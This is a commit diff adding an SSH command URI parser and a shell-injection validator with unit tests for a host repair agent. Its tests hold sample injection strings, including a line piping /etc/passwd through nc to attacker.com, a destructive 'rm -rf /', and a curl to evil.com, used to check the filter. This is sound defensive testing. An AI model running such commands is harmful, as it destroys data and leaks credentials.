feat(api): URI scheme 解析器 + Shell Injection 防護 (Sprint 3 T1)
Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
This commit is contained in:
@@ -35,6 +35,61 @@ _COMPONENT_RE = re.compile(r"^[a-z0-9][a-z0-9-]{0,30}$")
|
||||
|
||||
SSH_TIMEOUT = 60 # seconds
|
||||
|
||||
# =============================================================================
|
||||
# URI Scheme 解析
|
||||
# 2026-04-06 Claude Code: Sprint 3 T1
|
||||
# =============================================================================
|
||||
|
||||
@dataclass
|
||||
class SshCommandURI:
|
||||
"""解析後的 SSH_COMMAND URI"""
|
||||
scheme: str # "openclaw" | "ansible" | "ssh"
|
||||
host_or_layer: str # "docker-110" | "192.168.0.188" | "wooo@192.168.0.110"
|
||||
payload: str # component name | playbook filename | raw command
|
||||
|
||||
|
||||
_SUPPORTED_SCHEMES = {"openclaw", "ansible", "ssh"}
|
||||
_SHELL_METACHAR_RE = re.compile(r'[;&|`&]|\$\(')
|
||||
_MAX_COMMAND_LEN = 512
|
||||
|
||||
|
||||
def parse_uri_command(command: str) -> SshCommandURI:
|
||||
"""
|
||||
解析 SSH_COMMAND URI scheme。
|
||||
|
||||
支援格式:
|
||||
openclaw://docker-110/sentry
|
||||
ansible://192.168.0.188/vacuum_postgres.yml
|
||||
ssh://wooo@192.168.0.110/docker ps
|
||||
|
||||
Raises:
|
||||
ValueError: scheme 不支援或 payload 為空
|
||||
"""
|
||||
if "://" not in command:
|
||||
raise ValueError(f"Unsupported scheme: '{command}' (expected scheme://host/payload)")
|
||||
scheme, rest = command.split("://", 1)
|
||||
if scheme not in _SUPPORTED_SCHEMES:
|
||||
raise ValueError(f"Unsupported scheme: '{scheme}' (supported: {_SUPPORTED_SCHEMES})")
|
||||
if "/" not in rest:
|
||||
raise ValueError(f"Invalid URI '{command}': missing payload after host")
|
||||
host_or_layer, payload = rest.split("/", 1)
|
||||
if not payload:
|
||||
raise ValueError(f"Invalid URI '{command}': payload is empty")
|
||||
return SshCommandURI(scheme=scheme, host_or_layer=host_or_layer, payload=payload)
|
||||
|
||||
|
||||
def validate_shell_safety(command: str) -> None:
|
||||
"""
|
||||
驗證 ssh:// payload 不含 shell metacharacter 或超長命令。
|
||||
|
||||
Raises:
|
||||
ValueError: 含危險字元或超過長度限制
|
||||
"""
|
||||
if len(command) > _MAX_COMMAND_LEN:
|
||||
raise ValueError(f"Command too long: {len(command)} > {_MAX_COMMAND_LEN}")
|
||||
if _SHELL_METACHAR_RE.search(command):
|
||||
raise ValueError(f"Shell metacharacter detected in command: '{command}'")
|
||||
|
||||
|
||||
@dataclass
|
||||
class HostRepairResult:
|
||||
|
||||
@@ -2,6 +2,7 @@
|
||||
tests/test_host_repair_agent.py
|
||||
Host Repair Agent 單元測試
|
||||
不需要實際 SSH 連線 — 測試路由邏輯和命令組裝
|
||||
2026-04-06 Claude Code: Sprint 3 T1 — URI 解析與安全防護測試
|
||||
"""
|
||||
import asyncio
|
||||
import pytest
|
||||
@@ -129,3 +130,82 @@ class TestHostRepairAgent:
|
||||
result = await agent.repair(layer="docker-110", component="badcomponent")
|
||||
|
||||
assert result.success is False
|
||||
|
||||
|
||||
# =============================================================================
|
||||
# 測試 URI Scheme 解析
|
||||
# 2026-04-06 Claude Code: Sprint 3 T1
|
||||
# =============================================================================
|
||||
|
||||
class TestParseUriCommand:
|
||||
def test_openclaw_scheme(self):
|
||||
from src.services.host_repair_agent import parse_uri_command
|
||||
result = parse_uri_command("openclaw://docker-110/sentry")
|
||||
assert result.scheme == "openclaw"
|
||||
assert result.host_or_layer == "docker-110"
|
||||
assert result.payload == "sentry"
|
||||
|
||||
def test_ansible_scheme(self):
|
||||
from src.services.host_repair_agent import parse_uri_command
|
||||
result = parse_uri_command("ansible://192.168.0.188/vacuum_postgres.yml")
|
||||
assert result.scheme == "ansible"
|
||||
assert result.host_or_layer == "192.168.0.188"
|
||||
assert result.payload == "vacuum_postgres.yml"
|
||||
|
||||
def test_ssh_scheme(self):
|
||||
from src.services.host_repair_agent import parse_uri_command
|
||||
result = parse_uri_command("ssh://wooo@192.168.0.110/docker ps")
|
||||
assert result.scheme == "ssh"
|
||||
assert result.host_or_layer == "wooo@192.168.0.110"
|
||||
assert result.payload == "docker ps"
|
||||
|
||||
def test_invalid_scheme_raises(self):
|
||||
from src.services.host_repair_agent import parse_uri_command
|
||||
with pytest.raises(ValueError, match="Unsupported scheme"):
|
||||
parse_uri_command("http://example.com/cmd")
|
||||
|
||||
def test_missing_payload_raises(self):
|
||||
from src.services.host_repair_agent import parse_uri_command
|
||||
with pytest.raises(ValueError, match="payload"):
|
||||
parse_uri_command("ansible://192.168.0.188/")
|
||||
|
||||
def test_legacy_format_raises(self):
|
||||
from src.services.host_repair_agent import parse_uri_command
|
||||
with pytest.raises(ValueError, match="Unsupported scheme"):
|
||||
parse_uri_command("docker-110/sentry")
|
||||
|
||||
|
||||
class TestValidateShellSafety:
|
||||
def test_safe_command_passes(self):
|
||||
from src.services.host_repair_agent import validate_shell_safety
|
||||
validate_shell_safety("docker ps") # must not raise
|
||||
|
||||
def test_semicolon_blocked(self):
|
||||
from src.services.host_repair_agent import validate_shell_safety
|
||||
with pytest.raises(ValueError, match="Shell metacharacter"):
|
||||
validate_shell_safety("docker ps; rm -rf /")
|
||||
|
||||
def test_pipe_blocked(self):
|
||||
from src.services.host_repair_agent import validate_shell_safety
|
||||
with pytest.raises(ValueError, match="Shell metacharacter"):
|
||||
validate_shell_safety("cat /etc/passwd | nc attacker.com 9999")
|
||||
|
||||
def test_double_ampersand_blocked(self):
|
||||
from src.services.host_repair_agent import validate_shell_safety
|
||||
with pytest.raises(ValueError, match="Shell metacharacter"):
|
||||
validate_shell_safety("ls && curl http://evil.com")
|
||||
|
||||
def test_command_substitution_blocked(self):
|
||||
from src.services.host_repair_agent import validate_shell_safety
|
||||
with pytest.raises(ValueError, match="Shell metacharacter"):
|
||||
validate_shell_safety("echo $(id)")
|
||||
|
||||
def test_backtick_blocked(self):
|
||||
from src.services.host_repair_agent import validate_shell_safety
|
||||
with pytest.raises(ValueError, match="Shell metacharacter"):
|
||||
validate_shell_safety("echo `id`")
|
||||
|
||||
def test_too_long_blocked(self):
|
||||
from src.services.host_repair_agent import validate_shell_safety
|
||||
with pytest.raises(ValueError, match="too long"):
|
||||
validate_shell_safety("a" * 513)
|
||||
|
||||
Reference in New Issue
Block a user